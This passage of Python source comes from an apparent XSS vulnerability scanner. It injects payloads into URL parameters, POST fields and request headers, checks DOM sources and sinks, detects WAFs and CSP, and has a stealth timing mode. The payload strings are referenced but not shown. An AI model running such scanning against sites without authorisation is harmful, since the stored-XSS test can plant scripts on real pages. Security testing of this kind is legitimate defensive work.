            "csp_detected": False,
        }

        baseline = self._get(url)
        if baseline is None:
            result["evidence"].append("Baseline request failed")
            return result

        if not self._is_response_html(baseline):
            result["evidence"].append(
                f"Reflected XSS skipped — non-HTML content-type: "
                f"{baseline.headers.get('Content-Type', 'unknown')}"
            )
            return result

        waf = self._detect_waf(baseline)
        if waf:
            result["waf"] = waf
            result["evidence"].append(f"WAF detected ({waf}) — reflected XSS skipped")
            return result

        csp_present = self._detect_csp(baseline)
        result["csp_detected"] = csp_present

        ordered_params = self._prioritize_params(params)
        baseline_body  = baseline.text

        for param in ordered_params:
            if _get_exit_flag() or _get_skip_flag():
                break
            if self.circuit_breaker.is_dead(url):
                break

            if not self._probe_parameter(url, param, baseline_body):
                continue

            all_payloads = self._REFLECTED_PAYLOADS + self._BYPASS_PAYLOADS
            if self._oob_payloads:
                all_payloads = all_payloads + self._oob_payloads

            for payload in all_payloads:
                if _get_exit_flag() or _get_skip_flag():
                    break

                test_url = self._inject_param(url, param, payload)
                response = self._get(test_url)
                if response is None:
                    continue

                if not self._is_response_html(response):
                    continue

                if self._is_reflected_unescaped(response.text, payload):
                    if not self._payload_structure_present(response.text, payload):
                        continue

                    result["vulnerable"]  = True
                    result["parameters"].append(param)
                    result["payload"]     = payload

                    if csp_present:
                        result["confidence"] = XSSConfidence.MEDIUM.value
                        result["evidence"].append(
                            f"Unescaped reflection in [{param}] but CSP present — "
                            f"exploitability limited: {payload[:60]}"
                        )
                    else:
                        result["confidence"] = XSSConfidence.HIGH.value
                        result["evidence"].append(
                            f"Unescaped reflection in param [{param}]: {payload[:60]}"
                        )
                    return result

                if self.stealth:
                    _safe_sleep(random.uniform(0.5, 1.5))

        return result

    # ──────────────────────────────────────────────────────────────────────────
    #  [2] Stored XSS
    # ──────────────────────────────────────────────────────────────────────────

    def _test_stored(self, url: str, params: Dict[str, str]) -> Dict:
        """
        POST payloads to each parameter individually, then refetch via GET and
        check for marker survival.

        Content-type gate on both responses.
        WAF detection breaks BOTH payload loop and param loop immediately.

        [NEW-8] CSRF note: blind POST without a CSRF token will silently receive
        403/419 on token-protected endpoints, making them appear "safe". The result
        message notes this limitation so the analyst can follow up manually.
        """
        result = {
            "type":       "stored",
            "vulnerable": False,
            "confidence": XSSConfidence.NONE.value,
            "parameters": [],
            "payload":    None,
            "evidence":   [],
            "waf":        None,
            # [NEW-8] CSRF note always present in stored results
            "csrf_note":  (
                "Stored XSS test uses blind POST without CSRF token. "
                "Token-protected endpoints may return 403/419 silently — "
                "a 'not vulnerable' result on those should be verified manually."
            ),
        }

        if not params:
            return result

        waf_blocked = False

        for param in self._prioritize_params(params):
            if _get_exit_flag() or _get_skip_flag():
                break
            if waf_blocked:
                break

            for payload in self._STORED_PAYLOADS:
                if _get_exit_flag() or _get_skip_flag():
                    break

                post_data        = dict(params)
                post_data[param] = payload

                response = self._post(url, post_data)
                if response is None:
                    break

                waf = self._detect_waf(response)
                if waf:
                    result["waf"] = waf
                    result["evidence"].append(
                        f"WAF detected ({waf}) — stored XSS blocked on [{param}]"
                    )
                    waf_blocked = True
                    break

                # Stage 1 — immediate echo in POST response
                if (self._is_response_html(response)
                        and self._is_reflected_unescaped(response.text, payload)):
                    result["vulnerable"]  = True
                    result["confidence"]  = XSSConfidence.MEDIUM.value
                    result["parameters"].append(param)
                    result["payload"]     = payload
                    result["evidence"].append(
                        f"Payload echoed in POST response for param [{param}] "
                        f"(possible stored/reflected): {payload[:60]}"
                    )
                    return result

                # Stage 2 — refetch via GET and check for persistence
                if self.stealth:
                    _safe_sleep(random.uniform(1.0, 2.5))

                get_resp = self._get(url)
                if (get_resp
                        and self._is_response_html(get_resp)
                        and self._is_reflected_unescaped(get_resp.text, payload)):
                    result["vulnerable"]  = True
                    result["confidence"]  = XSSConfidence.HIGH.value
                    result["parameters"].append(param)
                    result["payload"]     = payload
                    result["evidence"].append(
                        f"Payload persisted in GET after POST for param [{param}] "
                        f"(stored XSS confirmed): {payload[:60]}"
                    )
                    return result

        return result

    # ──────────────────────────────────────────────────────────────────────────
    #  [3] DOM-based XSS
    # ──────────────────────────────────────────────────────────────────────────

    def _fetch_external_script(self, src: str, base_url: str) -> str:
        """
        Fetch an external JS file referenced in a <script src=""> tag.

        Caps response at _MAX_EXTERNAL_SCRIPT_BYTES and validates against
        _is_safe_external_url to block SSRF into private/loopback addresses.
        """
        try:
            if src.startswith("//"):
                src = "https:" + src
            elif src.startswith("/"):
                parsed = urlparse(base_url)
                src    = f"{parsed.scheme}://{parsed.netloc}{src}"
            elif not src.startswith("http"):
                return ""

            if not self._is_safe_external_url(src):
                return ""

            resp = self._get(src)
            if resp and resp.status_code == 200:
                return resp.text[: self._MAX_EXTERNAL_SCRIPT_BYTES]
            return ""
        except Exception:
            return ""

    @staticmethod
    def _tokenise_js(js_content: str, block_size: int = 40) -> List[List[str]]:
        """
        Split js_content into overlapping blocks of block_size logical lines.
        50% overlap ensures patterns crossing block boundaries are not missed.

        [NEW-6] Tokenises on BOTH newlines AND semicolons so that minified
        one-liner bundles (webpack/React) are correctly split into statements
        rather than producing a single enormous block that defeats the analysis.
        """
        # Split on newlines first, then further split long lines on semicolons
        raw_lines = js_content.splitlines()
        lines: List[str] = []
        for raw in raw_lines:
            if len(raw) > 500:
                # Minified line: split on ; to get individual statements
                parts = raw.split(";")
                lines.extend(p.strip() for p in parts if p.strip())
            else:
                if raw.strip():
                    lines.append(raw)

        if not lines:
            return [[]]

        step   = max(1, block_size // 2)
        blocks = []
        for i in range(0, len(lines), step):
            blocks.append(lines[i: i + block_size])
        return blocks

    def _test_dom(self, url: str) -> Dict:
        """
        Fetch the page, extract inline and external JS, then perform static
        source-to-sink analysis.

        safe_re compiled with re.DOTALL so /* ... */ block comments spanning
        multiple lines are correctly stripped before analysis.

        False-positive reduction:
          - Source and sink must co-occur in the SAME 40-line sliding block
          - Lines matching known-safe patterns are stripped
          - Confidence is LOW for a single pair; MEDIUM only for 2+ distinct pairs

        [NEW-6] Minified JS handling: _tokenise_js splits on ; in addition to
        newlines so one-liner bundles are decomposed into statement-level blocks.
        """
        result = {
            "type":       "dom",
            "vulnerable": False,
            "confidence": XSSConfidence.NONE.value,
            "sinks":      [],
            "sources":    [],
            "evidence":   [],
            "waf":        None,
        }

        response = self._get(url)
        if response is None:
            result["evidence"].append("Page fetch failed — DOM analysis skipped")
            return result

        waf = self._detect_waf(response)
        if waf:
            result["waf"] = waf

        body = response.text

        # Inline scripts
        inline_scripts = re.findall(
            r"<script[^>]*>([\s\S]*?)</script>", body, re.IGNORECASE
        )

        # External script URLs (cap at 5 fetches)
        external_srcs = re.findall(
            r'<script[^>]+src=["\']([^"\']+)["\']', body, re.IGNORECASE
        )
        external_bodies: List[str] = []
        for src in external_srcs[:5]:
            if _get_exit_flag() or _get_skip_flag():
                break
            ext_text = self._fetch_external_script(src, url)
            if ext_text:
                external_bodies.append(ext_text)

        all_js_parts = inline_scripts + external_bodies
        js_content   = "\n".join(all_js_parts) if all_js_parts else body

        # Compile safe-pattern filter with DOTALL
        safe_re = re.compile(
            "|".join(self._DOM_SAFE_PATTERNS),
            re.IGNORECASE | re.DOTALL,
        )

        # [NEW-6] Use _tokenise_js instead of plain splitlines
        blocks: List[List[str]] = self._tokenise_js(js_content, block_size=40)
        danger_pairs: List[Tuple[str, str]] = []

        for block_lines in blocks:
            clean_lines = [ln for ln in block_lines if not safe_re.search(ln)]
            clean_block = "\n".join(clean_lines)
            if not clean_block.strip():
                continue

            block_sources: List[str] = []
            block_sinks:   List[str] = []

            for src_pat in self._DOM_SOURCES:
                if re.search(src_pat, clean_block, re.IGNORECASE):
                    readable = src_pat.replace(r"\.", ".").replace(r"\s*", "")
                    block_sources.append(readable)

            for sink_pat in self._DOM_SINKS:
                if re.search(sink_pat, clean_block, re.IGNORECASE):
                    readable = (
                        sink_pat.split(r"\s")[0]
                        .replace(r"\.", ".")
                        .replace(r"\b", "")
                    )
                    block_sinks.append(readable)

            if block_sources and block_sinks:
                for src in block_sources:
                    for snk in block_sinks:
                        pair = (src, snk)
                        if pair not in danger_pairs:
                            danger_pairs.append(pair)

        if danger_pairs:
            all_sources = list({p[0] for p in danger_pairs})
            all_sinks   = list({p[1] for p in danger_pairs})

            result["vulnerable"] = True
            result["sources"]    = all_sources[:6]
            result["sinks"]      = all_sinks[:6]

            result["confidence"] = (
                XSSConfidence.MEDIUM.value
                if len(danger_pairs) >= 2
                else XSSConfidence.LOW.value
            )

            result["evidence"].append(
                f"Source(s): {', '.join(all_sources[:3])} → "
                f"Sink(s): {', '.join(all_sinks[:3])} "
                f"({len(danger_pairs)} co-occurrence(s) in same JS block)"
            )

        return result

    # ──────────────────────────────────────────────────────────────────────────
    #  [4] Header-based XSS
    # ──────────────────────────────────────────────────────────────────────────

    def _test_header_xss(self, url: str) -> Dict:
        """
        Inject the XSS marker into HTTP request headers that servers commonly
        reflect in error pages, debug output, or log-replay interfaces.

        [NEW-7] Tests _HEADER_PAYLOADS (7 variants) instead of a single
        fixed <script> tag. WAFs almost universally block <script> in headers,
        so softer variants improve hit rate on targets that reflect headers
        in error pages without heavy filtering.

        Tested headers: X-Forwarded-For, Referer, User-Agent,
                        X-Forwarded-Host, X-Original-URL.
        """
        result = {
            "type":       "header",
            "vulnerable": False,
            "confidence": XSSConfidence.NONE.value,
            "headers":    [],
            "payload":    None,
            "evidence":   [],
            "waf":        None,
        }

        if self.circuit_breaker.is_dead(url):
            return result

        baseline = self._get(url)
        if baseline is None:
            result["evidence"].append("Baseline request failed — header XSS skipped")
            return result

        if not self._is_response_html(baseline):
            result["evidence"].append("Header XSS skipped — non-HTML content-type")
            return result

        waf = self._detect_waf(baseline)
        if waf:
            result["waf"] = waf
            result["evidence"].append(f"WAF detected ({waf}) — header XSS skipped")
            return result

        for header_name in self._HEADER_INJECTION_TARGETS:
            if _get_exit_flag() or _get_skip_flag():
                break
            if self.circuit_breaker.is_dead(url):
                break

            # [NEW-7] Iterate over all header payload variants
            for payload in self._HEADER_PAYLOADS:
                if _get_exit_flag() or _get_skip_flag():
                    break

                response = self._get(url, extra_headers={header_name: payload})
                if response is None:
                    continue

                waf = self._detect_waf(response)
                if waf:
                    result["waf"] = waf
                    break  # WAF blocks this header — move to next

                if (self._is_response_html(response)
                        and self._is_reflected_unescaped(response.text, payload)):
                    result["vulnerable"] = True
                    result["confidence"] = XSSConfidence.HIGH.value
                    result["headers"].append(header_name)
                    result["payload"]    = payload
                    result["evidence"].append(
                        f"Unescaped reflection via header [{header_name}]: "
                        f"{payload[:60]}"
                    )
                    return result

                if self.stealth:
                    _safe_sleep(random.uniform(0.5, 1.5))

        return result

    # ──────────────────────────────────────────────────────────────────────────
    #  Main entry point
    # ──────────────────────────────────────────────────────────────────────────

    def test_xss(self, url: str) -> Dict:
        """
        Run all enabled XSS detection methods on url.

        Returns:
            {
                "tested":             bool,
                "vulnerable":         bool,
                "overall_confidence": str,       # XSSConfidence value
                "xss_types_found":    list[str],
                "waf_detected":       str|None,
                "csp_detected":       bool,
                "tests":              list[dict],
                "message":            str,
            }
        """
        result = {
            "tested":             False,
            "vulnerable":         False,
            "overall_confidence": XSSConfidence.NONE.value,
            "xss_types_found":    [],
            "waf_detected":       None,
            "csp_detected":       False,
            "tests":              [],
            "message":            "",
        }

        params       = self._extract_params(url)
        has_params   = bool(params)
        do_reflected = self.xss_type in ("reflected", "all")
        do_stored    = self.xss_type in ("stored",    "all")
        do_dom       = self.xss_type in ("dom",       "all")
        do_header    = self.xss_type in ("header",    "all")

        tests_run: List[Dict] = []

        if do_reflected and has_params:
            self._cb("reflected")
            ref_result = self._test_reflected(url, params)
            tests_run.append(ref_result)
            if ref_result.get("csp_detected"):
                result["csp_detected"] = True

        if do_stored and has_params:
            if not (_get_exit_flag() or _get_skip_flag()):
                self._cb("stored")
                sto_result = self._test_stored(url, params)
                tests_run.append(sto_result)

        if do_dom:
            if not (_get_exit_flag() or _get_skip_flag()):
                self._cb("dom")
                dom_result = self._test_dom(url)
                tests_run.append(dom_result)

        if do_header:
            if not (_get_exit_flag() or _get_skip_flag()):
                self._cb("header")
                hdr_result = self._test_header_xss(url)
                tests_run.append(hdr_result)

        if not tests_run:
            result["message"] = "No testable parameters and no methods applicable"
            return result

        result["tested"] = True
        result["tests"]  = tests_run

        # Aggregate WAF (first found wins)
        for t in tests_run:
            if t.get("waf"):
                result["waf_detected"] = t["waf"]
                break

        # Aggregate findings
        vuln_tests  = [t for t in tests_run if t.get("vulnerable")]
        types_found = [t["type"] for t in vuln_tests]
        result["xss_types_found"] = types_found

        if vuln_tests:
            result["vulnerable"] = True

            score = 0
            for t in vuln_tests:
                conf = t.get("confidence", XSSConfidence.NONE.value)
                rank = _CONF_RANK.get(conf, 0)
                score += rank

            if score >= 5:
                result["overall_confidence"] = XSSConfidence.CRITICAL.value
            elif score >= 3:
                result["overall_confidence"] = XSSConfidence.HIGH.value
            elif score >= 2:
                result["overall_confidence"] = XSSConfidence.MEDIUM.value
            else:
                result["overall_confidence"] = XSSConfidence.LOW.value

            result["message"] = (
                f"XSS detected — type(s): {', '.join(types_found)}  "
                f"confidence: {result['overall_confidence']}"
            )
        else:
            result["message"] = "No XSS vulnerability detected"

        return result
